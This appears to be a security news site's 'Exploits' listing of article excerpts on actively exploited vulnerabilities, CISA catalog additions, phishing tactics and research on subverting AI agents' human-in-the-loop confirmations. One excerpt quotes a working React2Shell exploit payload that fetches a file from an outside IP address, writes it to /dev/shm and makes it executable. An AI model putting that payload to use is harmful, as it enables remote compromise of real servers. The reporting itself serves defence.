Category: Exploits

A surge in phishing attacks exploiting Microsoft’s OAuth device code flow has been identified by Proofpoint

Read more →

Hewlett Packard Enterprise (HPE) has resolved a maximum-severity security flaw in OneView Software that, if successfully exploited, could result in remote code execution. The critical vulnerability, assigned the CVE identifier CVE-2025-37164, carries a CVSS score of 10.0. HPE OneView is an IT infrastructure management software that streamlines IT operations and controls all systems via a

Read more →

Human-in-the-loop (HITL) safeguards that AI agents rely on can be subverted, allowing attackers to weaponize them to run malicious code, new research from CheckMarx shows. HITL dialogs are a safety backstop (a final “are you sure?”) that the agents run before executing sensitive actions like running code, modifying files, or touching system resources. Checkmarx researchers…

Read more →

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a critical flaw impacting ASUS Live Update to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerability, tracked as CVE-2025-59374 (CVSS score: 9.3), has been described as an “embedded malicious code vulnerability” introduced by means of a supply chain compromise

Read more →

SonicWall has rolled out fixes to address a security flaw in Secure Mobile Access (SMA) 100 series appliances that it said has been actively exploited in the wild. The vulnerability, tracked as CVE-2025-40602 (CVSS score: 6.6), concerns a case of local privilege escalation that arises as a result of insufficient authorization in the appliance management…

Read more →

I have already talked about various React2Shell exploit attempts we have observed in the last weeks. But new varieties of the exploit are popping up, and the most recent one is using this particular version of the exploit: POST /app HTTP/1.1 Host: 81.187.66.58 Content-Type: multipart/form-data; boundary=—-WebKitFormBoundary7MA4YWxkTrZu0gW Next-Action: 0 Rsc-Action: 0 Content-Length: 388 User-Agent: Mozilla/5.0 (Windows…

Read more →

I have already talked about various React2Shell exploit attempts we have observed in the last weeks. But new varieties of the exploit are popping up, and the most recent one is using this particular version of the exploit: POST /app HTTP/1.1 Host: 81.187.66.58 Content-Type: multipart/form-data; boundary=—-WebKitFormBoundary7MA4YWxkTrZu0gW Next-Action: 0 Rsc-Action: 0 Content-Length: 388 User-Agent: Mozilla/5.0 (Windows…

Read more →

A US Securities and Exchange Commission committee has recommended a new rule that would mandate companies to analyze and report all AI efforts — including decisions to not use AI for some purposes.  Attorneys who have studied the proposal note that the AI rule — just like the SEC’s cybersecurity rule from about two years…

Read more →

Threat actors aren’t wasting time taking advantage of newly-revealed vulnerabilities in Fortinet device authentication. Researchers at Arctic Wolf said they are seeing malicious single sign on (SSO) attempts trying to leverage the holes in FortiGate next generation firewalls since Fortinet alerted admins about the vulnerabilities on December 9. “We have seen tens of intrusions since…

Read more →

A Russian state-sponsored cyberespionage group has been targeting energy companies and critical infrastructure providers by exploiting misconfigurations in network-edge devices. The group has been operating since at least 2021 and has exploited device misconfigurations before but also known vulnerabilities such as CVE-2022-26318 in WatchGuard Firebox and XTM appliances, CVE-2021-26084 and CVE-2023-22518 in Confluence or CVE-2023-2753…

Read more →

Threat actors have begun to exploit two newly disclosed security flaws in Fortinet FortiGate devices, less than a week after public disclosure. Cybersecurity company Arctic Wolf said it observed active intrusions involving malicious single sign-on (SSO) logins on FortiGate appliances on December 12, 2025. The attacks exploit two critical authentication bypasses (CVE-2025-59718 and CVE-2025-59719

Read more →

The security vulnerability known as React2Shell is being exploited by threat actors to deliver malware families like KSwapDoor and ZnDoor, according to findings from Palo Alto Networks Unit 42 and NTT Security. “KSwapDoor is a professionally engineered remote access tool designed with stealth in mind,” Justin Moore, senior manager of threat intel research at Palo…

Read more →

Exploits for React2Shell (CVE-2025-55182) remain active. However, at this point, I would think that any servers vulnerable to the “plain” exploit attempts have already been exploited several times. Here is today’s most popular exploit payload: ——WebKitFormBoundaryxtherespoopalloverme Content-Disposition: form-data; name=”0″ {“then”:”$1:__proto__:then”,”status”:”resolved_model”,”reason”:-1,”value”:”{“then”:”$B1337″}”,”_response”:{“_prefix”:”process.mainModule.require(‘http’).get(‘http://51.81.104.115/nuts/poop’,r=>r.pipe(process.mainModule.require(‘fs’).createWriteStream(‘/dev/shm/lrt’).on(‘finish’,()=>process.mainModule.require(‘fs’).chmodSync(‘/dev/shm/lrt’,0o755))));”,”_formData”:{“get”:”$1:constructor:constructor”}}} ——WebKitFormBoundaryxtherespoopalloverme Content-Disposition: form-data; name=”1″ “$@0” ——WebKitFormBoundaryxtherespoopalloverme ——WebKitFormBoundaryxtherespoopalloverme– To make the key components more readable: process.mainModule.require(‘http’).get(‘http://51.81.104.115/nuts/poop’,…

Read more →

If you use a smartphone, browse the web, or unzip files on your computer, you are in the crosshairs this week. Hackers are currently exploiting critical flaws in the daily software we all rely on—and in some cases, they started attacking before a fix was even ready. Below, we list the urgent updates you need…

Read more →

Over the last 12 months, security teams continued to walk a tightrope between moving fast to adopt new technologies and facing escalating threats fuelled mostly by the rise of AI. As the year comes to a close, CISOs reflect on some of the takeaways that have shaped the security landscape in 2025. 1. AI gave…

Read more →

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a high-severity flaw impacting Sierra Wireless AirLink ALEOS routers to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation in the wild. CVE-2018-4063 (CVSS score: 8.8/9.9) refers to an unrestricted file upload vulnerability that could be exploited to achieve remote code

Read more →

Apple on Friday released security updates for iOS, iPadOS, macOS, tvOS, watchOS, visionOS, and its Safari web browser to address two security flaws that it said have been exploited in the wild, one of which is the same flaw that was patched by Google in Chrome earlier this week. The vulnerabilities are listed below –…

Read more →

Today’s AI-enabled attackers are agnostic: They’re not limiting themselves to specific companies, products, or services — they’re going where the vulnerabilities are. To meet them on this ground, Microsoft is pivoting its cybersecurity strategy to what it calls ‘In Scope by Default.’ Now, any “critical vulnerability” with a “demonstrable impact” on Microsoft’s online services is…

Read more →

As exploitation activity against CVE-2025-55182, researchers are finding some proof-of-concept exploits contain bypasses for Web application firewall (WAF) rules.

Read more →

The React team has released fixes for two new types of flaws in React Server Components (RSC) that, if successfully exploited, could result in denial-of-service (DoS) or source code exposure. The team said the issues were found by the security community while attempting to exploit the patches released for CVE-2025-55182 (CVSS score: 10.0), a critical…

Read more →

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged federal agencies to patch the recent React2Shell vulnerability by December 12, 2025, amid reports of widespread exploitation. The critical vulnerability, tracked as CVE-2025-55182 (CVSS score: 10.0), affects the React Server Components (RSC) Flight protocol. The underlying cause of the issue is an unsafe deserialization

Read more →

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a high-severity security flaw impacting OSGeo GeoServer to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation in the wild. The vulnerability in question is CVE-2025-58360 (CVSS score: 8.2), an unauthenticated XML External Entity (XXE) flaw that affects all versions prior…

Read more →

OpenAI is preparing for the possibility that threat groups will try to abuse its increasingly powerful AI frontier models to carry out sophisticated cyberattacks. In a blog, the company describes how the evolving capabilities of its models could be used to “develop working zero-day remote exploits against well-defended systems, or meaningfully assist with complex, stealthy…

Read more →

A new variation of the ClickFix scam tries to get around phishing defenses by capturing an employee’s OAuth authentication token for Microsoft logins. Researchers at Push Security this week outlined the tactic, which they call ConsentFix, in a blog, calling it “a dangerous evolution of ClickFix and consent phishing that is incredibly hard for traditional…

Read more →

Researchers have uncovered fresh techniques for breaking SAML-based authentication, further undermining the security assurances offered by the aging by still widely used authentication protocol. SAML (Security Assertion Markup Language) has been the backbone of enterprise single sign-on (SSO) technologies for more than 20 years. During a presentation at the Black Hat Europe conference on Wednesday,…

Read more →

A high-severity unpatched security vulnerability in Gogs has come under active exploitation, with more than 700 compromised instances accessible over the internet, according to new findings from Wiz. The flaw, tracked as CVE-2025-8110 (CVSS score: 8.7), is a case of file overwrite in the file update API of the Go-based self-hosted Git service. A fix…

Read more →

Google has released a Chrome security update to fix three zero-day vulnerabilities, including a high-severity flaw with an active exploit

Read more →

Google on Wednesday shipped security updates for its Chrome browser to address three security flaws, including one it said has come under active exploitation in the wild. The vulnerability, rated high in severity, is being tracked under the Chromium issue tracker ID “466192044.” Unlike other disclosures, Google has opted to keep information about the CVE…

Read more →

Huntress is warning of a new actively exploited vulnerability in Gladinet’s CentreStack and Triofox products stemming from the use of hard-coded cryptographic keys that have affected nine organizations so far. “Threat actors can potentially abuse this as a way to access the web.config file, opening the door for deserialization and remote code execution,” security researcher…

Read more →

Researchers uncovered an unexpected behavior of HTTP client proxies when created in .NET code, potentially allowing attackers to write malicious code to arbitrary files. This in turn can open remote code execution (RCE) attack paths through web shells and malicious PowerShell scripts in many .NET applications, including commercial products. Microsoft does not plan to fix…

Read more →

React2Shell continues to witness heavy exploitation, with threat actors leveraging the maximum-severity security flaw in React Server Components (RSC) to deliver cryptocurrency miners and an array of previously undocumented malware families, according to new findings from Huntress. This includes a Linux backdoor called PeerBlight, a reverse proxy tunnel named CowTunnel, and a Go-based

Read more →

New research has uncovered exploitation primitives in the .NET Framework that could be leveraged against enterprise-grade applications to achieve remote code execution. WatchTowr Labs, which has codenamed the “invalid cast vulnerability” SOAPwn, said the issue impacts Barracuda Service Center RMM, Ivanti Endpoint Manager (EPM), and Umbraco 8. But the number of affected vendors is likely…

Read more →

Pro-Russia hacktivist groups have been observed exploiting exposed virtual network computing connections to breach OT systems

Read more →

Last year, Kubernetes fixed a command injection vulnerability in the Kubernetes NodeLogQuery feature (%%cve:2024-9042%%) [1]. To exploit the vulnerability, several conditions had to be met: The vulnerable node had to run Windows The attacker had to have permissions to read logs The NogeLogQuery feature had to be enabled (at least at the time, it was…

Read more →